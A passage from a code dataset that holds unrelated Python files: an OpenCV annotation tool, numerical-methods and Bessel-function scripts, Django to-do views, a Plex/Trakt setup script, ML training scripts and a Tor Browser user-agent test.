0)\n self.mouse_dragging = False\n elif event == cv2.EVENT_MOUSEMOVE and self.mouse_dragging:\n # self.logger.info('DRAG: %d, %d', x, y)\n self.end_pt = (x, y)\n\n\n def generate_my_annotation(self, img_path, edit=False):\n\n # annotation path\n head, tail = os.path.split(img_path)\n # root, ext = os.path.splitext(tail)\n annotation_path = self.my_annotation_dir + tail + '.pkl'\n\n # bbox path\n bbox_path = self.my_annotation_img_dir + 'bbox_' + tail\n\n # load image\n self.im_orig = cv2.imread(img_path)\n\n # if edit is true, load bbox info from annotation file\n if edit:\n f = open(annotation_path, 'rb')\n self.bboxes = pickle.load(f)\n f.close()\n\n while True:\n im_copy = self.im_orig.copy()\n\n # draw rectangles\n if self.start_pt is not (0, 0) and self.end_pt is not (0, 0):\n cv2.rectangle(im_copy, self.start_pt, self.end_pt, (0, 0, 255), 1)\n for box in self.bboxes:\n cv2.rectangle(im_copy, box[0], box[1], (0, 255, 0), 1)\n\n # show image to generate annotations\n cv2.imshow(self.GENERATOR_WINDOW_NAME, im_copy)\n key = cv2.waitKey(10)\n if key == ord('q'): # 'q' key\n cv2.destroyAllWindows()\n return False\n elif key == 32: # space key\n self.logger.info('saving annotation data: %s', annotation_path)\n f = open(annotation_path, 'wb')\n pickle.dump(self.bboxes, f)\n f.close()\n self.logger.info('saving bounding box data: %s', bbox_path)\n cv2.imwrite(bbox_path, im_copy)\n self.bboxes = []\n return True\n elif key == ord('d'): # 'd' key\n if len(self.bboxes) > 0:\n self.bboxes.pop()\n else:\n self.logger.info('no bounding boxes to delete')\n return True\n\n def generate_annotations(self, skip=True):\n\n for pos_image_file in self.pos_img_files:\n\n edit = False\n if pos_image_file in [os.path.splitext(annotation_file)[0] for annotation_file in self.my_annotation_files]:\n if skip:\n self.logger.info('skipping: %s is already added annotation', pos_image_file)\n continue\n else:\n self.logger.info('edit: %s is already added annotation', pos_image_file)\n edit = True\n else:\n self.logger.info('new: %s', pos_image_file)\n\n pos_img_path = self.pos_img_dir + pos_image_file\n is_continue = self.generate_my_annotation(pos_img_path, edit)\n if not is_continue:\n return\n\n def create_positive_dat(self):\n output_text = \"\"\n self.logger.info(\"begin creating positive.dat\")\n for file_name in self.my_annotation_files:\n\n # annotation path\n annotation_path = self.my_annotation_dir + file_name\n f = open(annotation_path, 'rb')\n bboxes = pickle.load(f)\n f.close()\n root, ext = os.path.splitext(file_name)\n output_text += \"%s %d \" % (self.pos_img_dir + root, len(bboxes))\n for bbox in bboxes:\n x_min, y_min = min(bbox[0][0], bbox[1][0]), min(bbox[0][1], bbox[1][1])\n x_max, y_max = max(bbox[0][0], bbox[1][0]), max(bbox[0][1], bbox[1][1])\n w = x_max - x_min\n h = y_max - y_min\n output_text += \"%d %d %d %d \" % (x_min, y_min, w, h)\n output_text += \"\\n\"\n # print output_text\n self.logger.info(\"writing data to positive.dat\")\n f = open('positive.dat', 'w')\n f.write(output_text)\n f.close()\n self.logger.info(\"completed writing data to positive.dat\")\n\nif __name__ == '__main__':\n\n # log level setting\n logging.root.setLevel(level=logging.INFO)\n\n # generate AnnotationGenerator\n generator = AnnotationGenerator()\n\n # generate annotations by GUI\n # if given True, generator skips file you already added annotations(default).\n # if given False, you can edit file you already added annotations.\n generator.generate_annotations(True)\n\n # create positive.dat for opencv\n generator.create_positive_dat()\n","sub_path":"annotation_generator.py","file_name":"annotation_generator.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"107007506","text":"# CTA200H Question 3\n\nimport numpy as np\nimport pylab as plt\nimport scipy as sc\nimport matplotlib.pyplot as py\nfrom time import time\nfrom scipy import special\n\n# Question 3 (a)\n\ndef fm(theta, m, x):\n \"\"\"\n Integrad in bessel function Jm(x).\n \"\"\"\n return np.cos((m*theta) - x*np.sin(theta))/np.pi\n\ndef simpson_integration(f, N, a, b, m, x):\n \"\"\"\n Simpson method of integration.\n f is the integrand being integrated\n N is the number of sections in interval\n a is the start of the interval\n b is the end of the interval\n m is a nonnegative integer needed for integrand of bessel function\n \"\"\"\n h = (b-a)/N #width of the quadratic curves\n #implimenting simpson rule equation\n t1 = f(a, m, x) + f(b, m, x) #setting inital sum value\n t2 = 0\n #looping through odd terms of sum\n for k in range(1,N,2):\n t2 += f(a + k*h, m, x)\n t2 *= 4\n\n t3 = 0\n for k in range(2,N,2):\n t3 += f(a + k*h, m, x)\n t3 *= 2\n\n #multiplying total sum\n t = (h/3) * (t1 + t2 + t3)\n\n #print(\"Integral from simpson's rule = \", t)\n return t\n\ndef J(m, x):\n \"\"\"\n Bessel function Jm(x).\n m is a nonnegative int\n x >= 0\n \"\"\"\n N = 1000 #number of sections splitting interval\n a = 0 #start of interval\n b = np.pi #end of interval\n \n s = simpson_integration(fm, N, a, b, m, x)\n \n return s\n\n\nx = np.linspace(0, 20, 100)\n#running bessel function for m=0,1,2\ny_0 = J(0, x)\ny_1 = J(1, x)\ny_2 = J(2, x)\ny_3 = J(3, x)\n\n#plotting bessel function for m =0,1,2\nplt.figure(figsize=(10,6))\nplt.plot(x, y_0, label='simpson: m=0', marker='.', linestyle='none', color='b')\nplt.plot(x, y_1, label='simpson: m=1', marker='.', linestyle='none', color='orange')\nplt.plot(x, y_2, label='simpson: m=2', marker='.', linestyle='none', color='g')\nplt.plot(x, y_3, label='simpson: m=3', marker='.', linestyle='none', color='r')\n\n# using scipy's special.jv function to find y values and compare them to\n# Simpson's method for m=0,1,2, 3\ny_sc0 = sc.special.jv(0, x)\ny_sc1 = sc.special.jv(1, x)\ny_sc2 = sc.special.jv(2, x)\ny_sc3 = sc.special.jv(3, x)\n\n#plotting the results from scipy's function overtop our own results\nplt.plot(x, y_sc0, label='scipy: m=0', color='b')\nplt.plot(x, y_sc1, label='scipy: m=1', color='orange')\nplt.plot(x, y_sc2, label='scipy: m=2', color='g')\nplt.plot(x, y_sc3, label='scipy: m=3', color='r')\n\nplt.legend()\nplt.xlabel(\"x\")\nplt.ylabel(\"Jm(x)\")\nplt.title(\"Bessel Function for Different m Values:\\nSimpson's vs. Scipy Method\")\nplt.show()\nplt.clf()\n\n#==============================================================================\n\n# Question 3 b\n\ndef I(I_0, lamb, r):\n \"\"\"\n Intensity pattern (point spread function) from the telescope.\n I_0 intensity at the centre\n lamb wavelength of light\n r is defined to be equal to aq/R\n \"\"\"\n x = 2*np.pi*r / lamb \n# return I_0 * (2*J(1,x)/x)**2\n # use scipy special function bessel function to speed things up\n return I_0 * (2*sc.special.jv(1, x)/x)**2\n\n# define intensity parameters\nI_0 = 1 # intensity at centre\nlamb = 0.5 # wavelength in µm\n\n# create a 2d grid\nx = np.arange(-1, 1, 0.01)\ny = np.arange(-1, 1, 0.01)\nxx, yy = np.meshgrid(x, y)\nr = np.sqrt(xx**2 + yy**2)\nz = I(I_0, lamb, r)\n\n# plot intensity pattern\nplt.figure(figsize=(6,6))\nplt.imshow(z, extent=[-1,1,-1,1])\nplt.title(\"Intensity Pattern (Normal)\\nwith I_0 = {0}, $\\lambda$ = {1}µm\".format(I_0,lamb))\nplt.xlabel(\"x in µm\")\nplt.ylabel(\"y in µm\")\nplt.show()\nplt.clf()\n\n# plot intensity pattern with higher contrast to see the behaviour more clearly\nplt.figure(figsize=(6,6))\nplt.imshow(z, vmin = 0, vmax = 0.1, extent=[-1,1,-1,1])\nplt.title(\"Intensity Pattern (High Contrast vmax = 0.1)\\nwith I_0 = {0}, $\\lambda$ = {1}µm\".format(I_0,lamb))\nplt.xlabel(\"x in µm\")\nplt.ylabel(\"y in µm\")\nplt.show()\nplt.clf()\n\n\n#==============================================================================\n\n# Question 3 c\n\nfrom scipy import signal\n\n# Import some image data\nfrom skimage import data\ncamera = data.camera()\n\n# Define grid\nx1 = np.linspace(-1.5, 1.5, 512)\ny1 = np.linspace(-1.5, 1.5, 512)\n[X,Y] = np.meshgrid(x1,y1)\nr1 = np.sqrt(X**2 + Y**2)\n\nv_I = np.vectorize(I) # Vectorize point spread function\nz1 = v_I(I_0, 0.2, r1) # values of point spread function on this grid\n\n# Convolution\nconv = signal.fftconvolve(camera,z1) # other methods took indefinite time\n\n# Plotting original image\nplt.figure(0)\nplt.imshow(camera)\nplt.title(\"Original Image\")\nplt.show()\n\n# Plotting convolved image\nplt.figure(1)\nplt.imshow(conv)\nplt.title(\"Convolved Image\")\nplt.xlim(200,800)\nplt.ylim(800,200)\nplt.show()\n\n\n","sub_path":"question3/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"386080959","text":"\"\"\"The views module.\"\"\"\n\nimport dateutil.parser\nimport json\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout as auth_logout\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import models as auth_models\nfrom rest_framework import viewsets\nimport serializers\n\nimport models as main_app_models\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n\n queryset = auth_models.User.objects.all()\n serializer_class = serializers.UserSerializer\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n\n queryset = main_app_models.Comment.objects.all()\n serializer_class = serializers.CommentSerializer\n\n\nclass TaskViewSet(viewsets.ModelViewSet):\n\n queryset = main_app_models.Task.objects.all()\n serializer_class = serializers.TaskSerializer\n\n\nclass TODOListViewSet(viewsets.ModelViewSet):\n\n queryset = main_app_models.TODOList.objects.all()\n serializer_class = serializers.TODOListSerializer\n\n\n@login_required\ndef home(request):\n\n context = {}\n return render(request, 'index.html', context)\n\n\ndef logout(request):\n \"\"\"Log out user.\"\"\"\n auth_logout(request)\n return redirect(\"/\")\n\n\ndef todo_list_form(request):\n\n if request.method == \"POST\":\n\n post_data = json.loads(request.body)\n\n if \"id\" in post_data:\n\n todo_list = main_app_models.TODOList.objects.get(pk=int(post_data[\"id\"]))\n todo_list.title = post_data[\"title\"]\n todo_list.save()\n\n else:\n\n main_app_models.TODOList(title=post_data[\"title\"]).save()\n\n return HttpResponse()\n\n\ndef task_form(request):\n\n if request.method == \"POST\":\n\n post_data = json.loads(request.body)\n\n if \"id\" in post_data:\n\n task = main_app_models.Task.objects.get(pk=int(post_data[\"id\"]))\n\n if \"deadline\" in post_data:\n\n if post_data[\"deadline\"]:\n task.deadline = dateutil.parser.parse(post_data[\"deadline\"])\n\n if \"description\" in post_data:\n\n task.description = post_data[\"description\"]\n\n if \"done\" in post_data:\n\n task.done = post_data[\"done\"]\n\n task.save()\n\n else:\n\n params = dict()\n\n params[\"description\"] = post_data[\"description\"]\n\n if \"deadline\" in post_data:\n\n params[\"deadline\"] = dateutil.parser.parse(post_data[\"deadline\"])\n\n task = main_app_models.Task(**params)\n task.save()\n\n todo_list = main_app_models.TODOList.objects.get(pk=int(post_data[\"parent_list\"]))\n todo_list.tasks.add(task)\n todo_list.save()\n\n return HttpResponse()\n\n\ndef comment_form(request):\n\n if request.method == \"POST\":\n\n post_data = json.loads(request.body)\n\n comment = main_app_models.Comment(text=post_data[\"text\"], author=request.user)\n comment.save()\n\n parent_task = main_app_models.Task.objects.get(pk=int(post_data[\"parent_task\"]))\n parent_task.comments.add(comment)\n parent_task.save()\n\n return HttpResponse()\n\n\ndef delete_task(request):\n\n if request.method == \"POST\":\n\n task = main_app_models.Task.objects.get(pk=int(json.loads(request.body)[\"id\"]))\n\n for comment in task.comments.all():\n\n comment.delete()\n\n task.delete()\n\n return HttpResponse()\n\n\ndef delete_todo_list(request):\n\n if request.method == \"POST\":\n\n todo_list = main_app_models.TODOList.objects.get(pk=int(json.loads(request.body)[\"id\"]))\n\n for task in todo_list.tasks.all():\n\n for comment in task.comments.all():\n\n comment.delete()\n\n task.delete()\n\n todo_list.delete()\n\n return HttpResponse()\n","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"255751125","text":"# Code for binary search\n\n\ndef binary_search(arr, low, high, x):\n \"\"\"\n Parameters:\n 1)arr is the sorted array in which we will be finding the element\n 2)low is the lower bound of the interval in which we will\n be finding the element index\n 3)high is the upper bound of the interval in which we will\n be finding the element index\n 4)x is the element we are trying to find the index of\n\n Output: the index of the element x in the array arr.\n If the element x does not exist in array arr, -1 will\n be returned.\n \"\"\"\n\n while high >= low:\n mid = (high + low) // 2\n if arr[mid] == x: # Base Case 1\n return mid\n elif arr[mid] < x: # Recursive Case 1\n return binary_search(arr, mid + 1, high, x)\n else: # Recursive Case 2\n return binary_search(arr, low, mid - 1, x)\n else: # Base Case 2: element not found\n return -1\n\n\nprint(binary_search([1, 24, 28, 30, 40, 52], 0, 5, 28))\n","sub_path":"3_advanced/chapter18/examples/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"15297434","text":"# Write a program to check whether the input alphabet is vowel or not using if-else.\n\nalphabet = input(\"Enter the alphabet: \").lower()\n\n\nif alphabet in ('a','e','i','o','u') :\n print(\"%s alphabet is vowel alphabet.\" %alphabet)\nelse:\n print(\" it is not a vowel alphabet\")\n\n\n\n\n\n\n","sub_path":"vowelorNot.py","file_name":"vowelorNot.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"382029809","text":"from Non_linear import newton_raphson,call_func\r\n\r\ndef mul(a,lst): #multiplication of elements of a list with a scalar\r\n return [a*i for i in lst]\r\ndef add(*lst): #list addition similar to vector addition\r\n return [sum(i) for i in zip(*lst)]\r\n\r\n\r\n#---------------*********************--------------------#\r\n\r\ndef euler_forward(f,y0,x0,xstop,N,args=None):\r\n h = (xstop - x0) / N\r\n result = [y0];c=[x0]\r\n iter=0\r\n while iter50: #recursion limit\r\n print(\"The limit has reached.\")\r\n return r\r\n no_iteration+=1\r\n c1=r[0][-1] #boundry value at choice1\r\n choice1=r[1][0]\r\n if abs(c1-yb)0 or c1==c2:\r\n print(\"The choices are not good\")\r\n return r\r\n choice=(yb-c1)*(choice2-choice1)/(c2-c1) + choice1\r\n q,p=rk4(f,[ya,choice],a,b,N,args)\r\n c=p[0][-1]\r\n if abs(c - yb) < epsilon: return p\r\n if (c1 - yb) * (c - yb) > 0 : #change the choice1\r\n return _shooter_helper(f, ya, yb, a, b, p, s,epsilon, N, args, no_iteration + 1)\r\n else: #change the choice2\r\n return _shooter_helper(f, ya, yb, a, b, r, s,epsilon, N, args, no_iteration + 1)\r\n\r\n\r\n#shooter mathod\r\ndef shooter(f,ya,yb,choice1,choice2,a,b,N,epsilon=0.0001,args=None):\r\n x,r=rk4(f,[ya,choice1],a,b,N,args)\r\n x,s=rk4(f,[ya,choice2],a,b,N,args)\r\n return x, _shooter_helper(f, ya, yb, a, b, r,s ,epsilon, N, args, 0)\r\n\r\n\r\n#-----------------------**********************-----------------------------#\r\n\r\ndef print_to_file(file_name,*lst):\r\n f=open(file_name,\"w\")\r\n for i in zip(*lst):\r\n n=len(i)-1\r\n for j in range(n+1):\r\n if j 0:\n param = json.loads(param)\n\n '''对请求头做反序列化的处理:str变为字典'''\n header=datas[ExcelVarles1.headersdata]\n if len(str(header).strip())==0:pass\n elif len(str(header).strip())>0:\n header=json.loads(header)\n #print('header',header)\n\n '''\n 1. 获取到所有前置测试点的测试用例\n 2. 执行前置测试点\n 3. 获取他的结果信息\n 4. 拿到它的结果信息替换对应测试点的变量\n '''\n\n #执行前置条件关联的测试点,执行对应接口把响应结果拿到\n r=obj.post(\n url=excel.case_prev(datas[ExcelVarles1.casePre])[ExcelVarles1.caseUrl],\n json=json.loads(excel.case_prev(datas[ExcelVarles1.casePre])[ExcelVarles1.paramdata]))\n prevResult=r.json()['access_token']\n\n #拿到响应结果,替换被测关联测试点中请求头信息的变量\n header=excel.prevHeaders(prevResult)\n\n #处理状态码\n status_code=int(datas[ExcelVarles1.status_code])\n\n def case_assert_result(r):\n assert r.status_code==status_code\n assert datas[ExcelVarles1.expect] in json.dumps(r.json(), ensure_ascii=False)\n\n if datas[ExcelVarles1.method]=='get':\n r=obj.get(url=datas[ExcelVarles1.caseUrl],\n header=header)\n case_assert_result(r=r)\n elif datas[ExcelVarles1.method]=='post':\n r=obj.post(url=datas[ExcelVarles1.caseUrl],\n json=param,\n header=header)\n writeContent(content=str(r.json()[0]['datas']['id']))\n case_assert_result(r=r)\n elif datas[ExcelVarles1.method]=='delete':\n url=str(datas[ExcelVarles1.caseUrl]).replace('{bookID}',readContent())\n r=obj.delete(url=url,header=header)\n case_assert_result(r=r)\n\nif __name__=='__main__':\n pytest.main([\"-s\",\"-v\",\"test_login_token_book.py\"])","sub_path":"tests/test_login_token_book.py","file_name":"test_login_token_book.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"163451630","text":"from plexapi.myplex import MyPlexAccount\nimport utils\nfrom os import path\nimport trakt\nimport trakt.core\nimport trakt.users\n\ntrakt.core.CONFIG_PATH = path.join(path.dirname(path.abspath(__file__)), \".pytrakt.json\")\nenv_file = path.join(path.dirname(path.abspath(__file__)), \".env\")\n\nplex_needed = utils.input_yesno(\"-- Plex --\\nAre you logged into this server with a Plex account?\")\nif plex_needed:\n username = input(\"Please enter your Plex username: \")\n password = input(\"Please enter your Plex password: \")\n servername = input(\"Now enter the server name: \")\n account = MyPlexAccount(username, password)\n plex = account.resource(servername).connect() # returns a PlexServer instance\n token = plex._token\n users = account.users()\n if users:\n print(\"Managed user(s) found:\")\n for user in users:\n if user.friend is True:\n print(user.title)\n print(\"If you want to use a managed user enter its username,\")\n name = input(\"if you want to use your main account just press enter: \")\n while name:\n try:\n useraccount = account.user(name)\n except:\n if name != \"_wrong\":\n print(\"Unknown username!\")\n name = input(\"Please enter a managed username (or just press enter to use your main account): \")\n if not name:\n print(\"Ok, continuing with your account \" + username)\n break\n continue\n try:\n token = account.user(name).get_token(plex.machineIdentifier)\n username = name\n break\n except:\n print(\"Impossible to find the managed user \\'\"+name+\"\\' on this server!\")\n name = \"_wrong\"\n with open(env_file, 'w') as txt:\n txt.write(\"PLEX_USERNAME=\" + username + \"\\n\")\n txt.write(\"PLEX_TOKEN=\" + token + \"\\n\")\n txt.write(\"PLEX_BASEURL=\" + plex._baseurl + \"\\n\")\n txt.write(\"PLEX_FALLBACKURL=http://localhost:32400\\n\")\n print(\"Plex token and baseurl for {} have been added in .env file:\".format(username))\n print(\"PLEX_TOKEN={}\".format(token))\n print(\"PLEX_BASEURL={}\".format(plex._baseurl))\nelse:\n with open(env_file, \"w\") as txt:\n txt.write(\"PLEX_USERNAME=-\\n\")\n txt.write(\"PLEX_TOKEN=-\\n\")\n txt.write(\"PLEX_BASEURL=http://localhost:32400\\n\")\n\ntrakt.core.AUTH_METHOD=trakt.core.DEVICE_AUTH\nprint(\"-- Trakt --\")\nclient_id, client_secret = trakt.core._get_client_info()\ntrakt.init(client_id=client_id, client_secret=client_secret, store=True)\ntrakt_user = trakt.users.User('me')\nwith open(env_file, \"a\") as txt:\n txt.write(\"TRAKT_USERNAME=\" + trakt_user.username + \"\\n\")\nprint(\"You are now logged into Trakt. Your Trakt credentials have been added in .env and .pytrakt.json files.\")\nprint(\"You can enjoy sync! \\nCheck config.json to adjust settings.\")\nprint(\"If you want to change Plex or Trakt account, just edit or remove .env and .pytrakt.json files.\")","sub_path":"get_env_data.py","file_name":"get_env_data.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"59000243","text":"# Felix Hu\n\n# Using Scikit as primary ML library\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics \nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.datasets import make_classification\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.class_weight import compute_sample_weight\nimport matplotlib.pyplot as plt\nimport pickle # model persistence\n\n# STEP 0 Data\n\ndata = pd.read_csv('sqlite_data_ML_iterativeBuild_P70L30.csv')\nprint(\"COLUMNS: \"+str(data.columns))\n\n# Features we don't care about\ndel data[\"id\"]\ndel data[\"option_expiration\"]\ndel data[\"flow_ticker\"]\ndel data[\"flow_order_time\"]\ndel data[\"order_status\"]\ndel data[\"symbol\"]\ndel data[\"events\"]\ndel data[\"sector\"]\n#del data[\"option_reference_price\"]\n#del data[\"option_theta\"]\n#del data[\"option_vega\"]\n\n# TEMP, we actually want these but they contain Nans\n# print(data.isna().any())\n\ndata = data.dropna(how='any')\n\ndata = pd.get_dummies(data, columns=[\"option_call_or_put\", \"option_order_type\"])\n\nfeature_list = list(data.columns)\nprint(\"COLUMNS TO BE USED: \"+str(feature_list))\n\nprint(\"Number of unprofitable vs profitable:\")\nprint(data[\"profitable\"].value_counts())\n\nlabels = np.array(data[\"profitable\"])\ndata = data.drop(\"profitable\", axis = 1)\nprint(data.head(5))\n\ndata = np.array(data)\n\ntrain_data, test_data, train_labels, test_labels = train_test_split(data, labels, test_size = 0.1)\n\nclass_weight = \"balanced\"\n\nprint('Training Features Shape:', train_data.shape)\nprint('Training Labels Shape:', train_labels.shape)\nprint('Testing Features Shape:', test_data.shape)\nprint('Testing Labels Shape:', test_labels.shape)\nprint('Sample weights: '+ str(compute_sample_weight(class_weight=class_weight, y=train_labels)))\n\n# STEP 1 Training\n\n# best:\n# P125L30, maxdepth=3, 2750, 3000\n# P70L30, max_depth=4,trees=2750-3000, >40%\nada = GradientBoostingClassifier(n_estimators=2750, max_depth=4, validation_fraction=0.1)\n#ada.fit(train_data, train_labels, sample_weight=compute_sample_weight(class_weight=\"balanced\", y=train_labels))\nada.fit(train_data, train_labels, sample_weight=compute_sample_weight(class_weight=class_weight, y=train_labels))\n\n# STEP 2 Errors\nprint(\"TRAINING ACCURACY: \"+str(ada.score(train_data, train_labels)))\nprint(\"TESTING ACCURACY: \"+str(ada.score(test_data, test_labels)))\n\npredictions = ada.predict(test_data)\nconf_mat = confusion_matrix(test_labels, predictions)\nprint(conf_mat)\n\n#print(rf.feature_importances_)\n\n# STEP 3 Save Ensemble\nfilename = 'GradBoost_1.sav'\npickle.dump(ada, open(filename, 'wb'))","sub_path":"GradientBoost.py","file_name":"GradientBoost.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"57966173","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport tensorflow as tf\n\nimport pdb\nfrom lc import *\nfrom tensorflow.contrib.layers import *\nfrom tensorflow.contrib.keras.python.keras.layers import *\n\nconfig.LEARNING_RATE = 0.01\nconfig.DECAY_STEP = 75\nconfig.DECAY_RATE = 0.975\nconfig.L2_LAMBDA = 0.05\nconfig.STOP_THRESHOLD = -1\nconfig.RESTORE_FROM = None # \"08-10-17_04_10\"\n\nd = {\"name\": \"lambda_1\", \"discription\": \"TEST_D\", }\nl = Loader(d)\n\n'''\n def apply(self, inputs, *args, **kwargs):\n Apply the layer on a input.\n\n This simply wraps `self.__call__`.\n\n Arguments:\n inputs: Input tensor(s).\n *args: additional positional arguments to be passed to `self.call`.\n **kwargs: additional keyword arguments to be passed to `self.call`.\n'''\n\n\ndef max_out(inputs, num_units, axis=None):\n\n shape = inputs.get_shape().as_list()\n if shape[0] is None:\n shape[0] = -1\n if axis is None: # Assume that channel is the last dimension\n axis = -1\n num_channels = shape[axis]\n if num_channels % num_units:\n raise ValueError('number of features({}) is not '\n 'a multiple of num_units({})'.format(num_channels, num_units))\n shape[axis] = num_units\n shape += [num_channels // num_units]\n outputs = tf.reduce_max(tf.reshape(inputs, shape), -1, keep_dims=False)\n return outputs\n\n\ndef five_layers_lrelu(x, ref_y, test):\n test = None if not test else True\n # lrelu = LeakyReLU()\n hid1 = fully_connected(\n x, 1000, activation_fn=lambda input: max_out(input, 500), reuse=test, scope=\"layer1\")\n hid2 = fully_connected(\n hid1, 1000, activation_fn=lambda input: max_out(input, 250), reuse=test, scope=\"layer2\")\n hid3 = fully_connected(\n hid2, 1000, activation_fn=lambda input: max_out(input, 125), reuse=test, scope=\"layer3\")\n hid4 = fully_connected(\n hid3, 1000, activation_fn=lambda input: max_out(input, 50), reuse=test, scope=\"layer4\")\n hid5 = fully_connected(\n hid4, 1000, activation_fn=lambda input: max_out(input, 25), reuse=test, scope=\"layer5\")\n y = fully_connected(hid5, 1, activation_fn=tf.identity,\n reuse=test, scope=\"fc\")\n if not test:\n analysis.add_RMSE_loss(y, ref_y, \"train\")\n analysis.add_L2_loss()\n else:\n analysis.add_RMSE_loss(y, ref_y, \"test\")\n\ndef linear(x, ref_y, test):\n test = None if not test else True\n y = fully_connected(x, 1, activation_fn=tf.identity,\n reuse=test, scope=\"fc\")\n if not test:\n analysis.add_RMSE_loss(y, ref_y, \"train\")\n # analysis.add_L2_loss()\n else:\n\n analysis.add_RMSE_loss(y, ref_y, \"test\")\n\n\ndef apply_graph(graph):\n g1 = tf.Graph()\n with g1.as_default():\n x1, y1 = l.train()\n graph(x1, y1, False)\n\n x2, y2 = l.validation()\n graph(x2, y2, True)\n\n summarize_collection(\"trainable_variables\")\n summarize_collection(\"losses\")\n return g1\n\n\nwith apply_graph(five_layers_lrelu).as_default():\n train.simple_train(50000)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"287432480","text":"# coding=utf-8\r\n\"\"\"\r\n20. Valid Parentheses My Submissions Question\r\nGiven a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\r\n\r\nThe brackets must close in the correct order, \"()\" and \"()[]{}\" and \"([()])\" are all valid but \"(]\" and \"([)]\" are not.\r\n\r\nSubscribe to see which companies asked this question\r\n\r\n\"\"\"\r\n\r\n\r\nclass StackItem(object):\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\n\r\n\r\nclass Solution(object):\r\n def isValid(self, s):\r\n \"\"\"\r\n :type s: str\r\n :rtype: bool\r\n \"\"\"\r\n if not s or len(s) == 0 or len(s) % 2 != 0:\r\n return False\r\n parentheses_dict = {\"(\": \")\",\r\n \")\": \"(\",\r\n \"]\": \"[\",\r\n \"}\": \"{\",\r\n \"[\": \"]\",\r\n \"{\": \"}\"\r\n }\r\n head = None\r\n for i in range(len(s)):\r\n # 栈是空的,说明前面的都匹配\r\n if not head:\r\n head = StackItem(s[i])\r\n\r\n # 栈不空,有新的匹配后,出栈\r\n elif parentheses_dict[head.val] == s[i]:\r\n if head.next:\r\n head = head.next\r\n else:\r\n head = None\r\n # 栈不空,没有匹配,压入栈\r\n else:\r\n new_head = StackItem(s[i])\r\n new_head.next = head\r\n head = new_head\r\n if head:\r\n return False\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n print (Solution().isValid(\"([)]\"))\r\n","sub_path":"zishell/solution/easy/solution20_Valid Parentheses.py","file_name":"solution20_Valid Parentheses.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73398995","text":"from marionette_harness import MarionetteTestCase\nimport testsuite\n\nclass Test(MarionetteTestCase):\n def test_useragent(self):\n with self.marionette.using_context('content'):\n self.marionette.navigate('about:robots')\n js = self.marionette.execute_script\n # Check that useragent string is as expected\n # We better know the ESR version we're testing\n osname = testsuite.TestSuite().t['tbbinfos']['os']\n if osname == 'Linux':\n ua_os = 'X11; Linux x86_64'\n if osname == 'Windows':\n ua_os = 'Windows NT 6.1; Win64; x64'\n if osname == 'MacOSX':\n ua_os = 'Macintosh; Intel Mac OS X 10.13'\n ua_ver = '91.0'\n self.assertEqual(\"Mozilla/5.0 (\" + ua_os + \"; rv:\" + ua_ver + \") Gecko/20100101 Firefox/\" + ua_ver,\n js(\"return navigator.userAgent\"))\n","sub_path":"marionette/tor_browser_tests/test_fp_useragent.py","file_name":"test_fp_useragent.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"209601395","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# %% import\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport anatools as ana\nfrom scipy.ndimage.filters import gaussian_filter\nfrom h5py import File\nfrom yaml import load as load_yaml\nfrom glob import glob\nfrom os.path import splitext\nfrom scipy.optimize import fmin\nfrom numba import jit\n\n# %% read data file\n# config\nconfig = load_yaml(\"\"\"\n---\nimg_filename: /Users/daehyun/Documents/Sources/fermi-vmi-tmp/test/img.npy\nimg_key:\ngauss_blur: 3\n\"\"\")\nfilename = config['img_filename']\nkey = config['img_key']\nblur = config['gauss_blur']\n\n# do\n__fn, *_ = glob(filename)\n_, __ext = splitext(__fn)\nif '.npy' == __ext:\n img = np.load(__fn)\nif '.h5' == __ext:\n with File(*glob(filename), 'r') as f:\n img = f[key][...]\norigin = ana.Hist(gaussian_filter(img, blur).T) # shape=(x,z)\n\nplt.figure(figsize=(8, 8))\nplt.pcolormesh(origin.hist.T)\nplt.show()\n\n\n# %%\n@jit\ndef entropy(dist):\n mask = dist <= 0\n normalized = dist[~mask]/dist[~mask].sum()\n return (-normalized*np.log2(normalized)).sum()\n\n# %% sampling data and 